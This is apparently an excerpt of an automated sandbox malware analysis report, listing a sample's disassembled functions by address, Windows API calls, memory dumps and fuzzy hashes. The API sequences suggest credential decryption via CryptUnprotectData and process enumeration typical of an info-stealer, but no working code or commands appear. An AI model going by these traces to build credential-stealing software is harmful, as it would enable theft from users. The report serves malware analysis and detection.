                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -~w$;w_$@H7]$c\oo$me;
                                    • API String ID: 0-3379050250
                                    • Opcode ID: 6819a5a83f4f730b0d97c1cff5902b91f6ad166cfe459822b85dd9dd05c2373a
                                    • Instruction ID: fd2a378339b045931722529ea760ba628f16d05dcdda739dfc0e90de560f5670
                                    • Opcode Fuzzy Hash: 6819a5a83f4f730b0d97c1cff5902b91f6ad166cfe459822b85dd9dd05c2373a
                                    • Instruction Fuzzy Hash: C3B227F390C2149FE3046E2DDC8567ABBE5EF94720F1A4A3DEAC4D7744EA3598018693
                                    Function 0045C318 Relevance: 7.8, Strings: 5, Instructions: 1580COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7t?4$Geo[$b%'$tf'~$x%g
                                    • API String ID: 0-2187750480
                                    • Opcode ID: bba6c9580b66e738e5c1055d146d45e186bab3b12e20b7823a95e0b870eb93c7
                                    • Instruction ID: ee24991c35f4277840e412d7a2e0d76440560cf8c685417a3043963d5df5e6e3
                                    • Opcode Fuzzy Hash: bba6c9580b66e738e5c1055d146d45e186bab3b12e20b7823a95e0b870eb93c7
                                    • Instruction Fuzzy Hash: 78A22AF3A0C2009FE7046E2DEC8577ABBE9EF94320F16463DEAC5C7740E67598058696
                                    Function 0008C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                    • lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                    • lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                    • lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: fb5b4077386e941c78fc7b11391dc38818e84f9625eb47ae46e254aa827ce760
                                    • Instruction ID: 7cf60a212d1c0c550992f3594dde78d0c44affb8926c88b478d38a2a955f4965
                                    • Opcode Fuzzy Hash: fb5b4077386e941c78fc7b11391dc38818e84f9625eb47ae46e254aa827ce760
                                    • Instruction Fuzzy Hash: 09416DB591421EDBDB10DFA4DD89FEEB7B8BB48708F1045A8F509A6280D7705A84CFA1
                                    Function 00096920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 0009696C
                                    • sscanf.NTDLL ref: 00096999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000969C0
                                    • ExitProcess.KERNEL32 ref: 000969DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                    • Instruction ID: 553691634105c9edbc89f06f25b3688f270dd69b7f57c09778d9b8ef7790c18a
                                    • Opcode Fuzzy Hash: e08513a433fbdb050d94e147d75e71f92704544db75523194b8c635db61074a2
                                    • Instruction Fuzzy Hash: 3721CB75D1420CABCF04EFE4E9499EEB7B9BF48304F04852AE506E3250EB355609DBA9
                                    Function 00087240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0008724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00087254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00087281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000872A4
                                    • LocalFree.KERNEL32(?), ref: 000872AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                    • Instruction ID: 6baab73669f6eb53c19e37e24e0913d04fe4b88bb647246a582df4924e9b6cee
                                    • Opcode Fuzzy Hash: 58c29c7ca52253026c4cabb1ac25f5777bf83710273d2d443fed6b404dda830c
                                    • Instruction Fuzzy Hash: 3F011275A40208BBEB10DFE4DD4AF9D77B8FB44704F104155FB05AB2C0D670AA008B65
                                    Function 00099600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0009961E
                                    • Process32First.KERNEL32(000A0ACA,00000128), ref: 00099632
                                    • Process32Next.KERNEL32(000A0ACA,00000128), ref: 00099647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0009965C
                                    • CloseHandle.KERNEL32(000A0ACA), ref: 0009967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                    • Instruction ID: 0b66e62a007652c1e98bd5b7b0b0b0091a34d21ec5c262e12fba75dd7fb5a12b
                                    • Opcode Fuzzy Hash: 7757566010108f417a7abe5d36587dc775015db55e9605541bc31bbec28cd01b
                                    • Instruction Fuzzy Hash: AD010C75A00208EBCF24DFA5DD48FEDBBF8FB48304F104288A90696240D7349B44DF51
                                    Function 0045DD14 Relevance: 6.6, Strings: 4, Instructions: 1611COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: IYw>$IYw>$m3_{$s;{_
                                    • API String ID: 0-4280254159
                                    • Opcode ID: bf22612a831882701309d189eb3b11506633a81dc77a0c7dabfc6d75b8393688
                                    • Instruction ID: 5fcb4c992f572bd12db8beeeebf1546483f187d1471de394b9b7564c972840c4
                                    • Opcode Fuzzy Hash: bf22612a831882701309d189eb3b11506633a81dc77a0c7dabfc6d75b8393688
                                    • Instruction Fuzzy Hash: 93B206F36082049FE304AE2DEC8577AB7E9EF94720F1A853DE6C4C7744EA3598058697
                                    Function 00098EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00085184,40000001,00000000,00000000,?,00085184), ref: 00098EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                    • Instruction ID: 22504cfc9f0935ffe7b6bd86b6a52b0caf35c56c13643e60926f462d9a382a69
                                    • Opcode Fuzzy Hash: 719d190bed3db6718c233ab0f3fb32a0cdcefe89079d32cdd3fe6cb4c019c68c
                                    • Instruction Fuzzy Hash: 21110670200208AFDF40CF64E898FAA33A9AF8A304F10E558F9198B350DB35E841EB60
                                    Function 00089AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                    • Instruction ID: 9a6127d002cceeec661d744ba68c76980b915c2151ae74dd58f17e10827b1432
                                    • Opcode Fuzzy Hash: 1eb95aa87054b91d7a35c6c80b51b2d15caee9162813e3be58903358057b7b4c
                                    • Instruction Fuzzy Hash: BA11A2B4241208AFEB10DF64DC99FAA77B5FB89704F208158F9199B390C7B6A901CB94
                                    Function 00097A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000), ref: 00097A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00097A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D3F1E8,00000000,?,000A0E10,00000000,?,00000000,00000000,?), ref: 00097A7D
                                    • wsprintfA.USER32 ref: 00097AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                    • Instruction ID: 41ed6f284bbcf8af567a5e4150229919316100de69810ab92589b55dcf55d1a4
                                    • Opcode Fuzzy Hash: 3b6bd9e69828a4bf1b74210f1bf6dee4c04cc525210b233ca639c363bf3c21b8
                                    • Instruction Fuzzy Hash: E111A1B1945218EBEB20CF54DC49FA9B7B8FB44721F10439AEA0A932C0C7741E40CF52
                                    Function 00453D5E Relevance: 5.3, Strings: 3, Instructions: 1558COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3X|?$I?g$zN|
                                    • API String ID: 0-3293989720
                                    • Opcode ID: f95cfcea0ecc691f03aedb0baf38586a7e63d5c801cdcea045d73aa07ab0f6ae
                                    • Instruction ID: 3c91b1dc3cca4de78fdcdb83ea07239224d1849b141bc1d77324648425648877
                                    • Opcode Fuzzy Hash: f95cfcea0ecc691f03aedb0baf38586a7e63d5c801cdcea045d73aa07ab0f6ae
                                    • Instruction Fuzzy Hash: 76B2F4F360C204AFE7046F29EC8567AFBE9EF94760F1A492DEAC487740E63558408697
                                    Function 00457BD8 Relevance: 4.6, Strings: 3, Instructions: 850COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
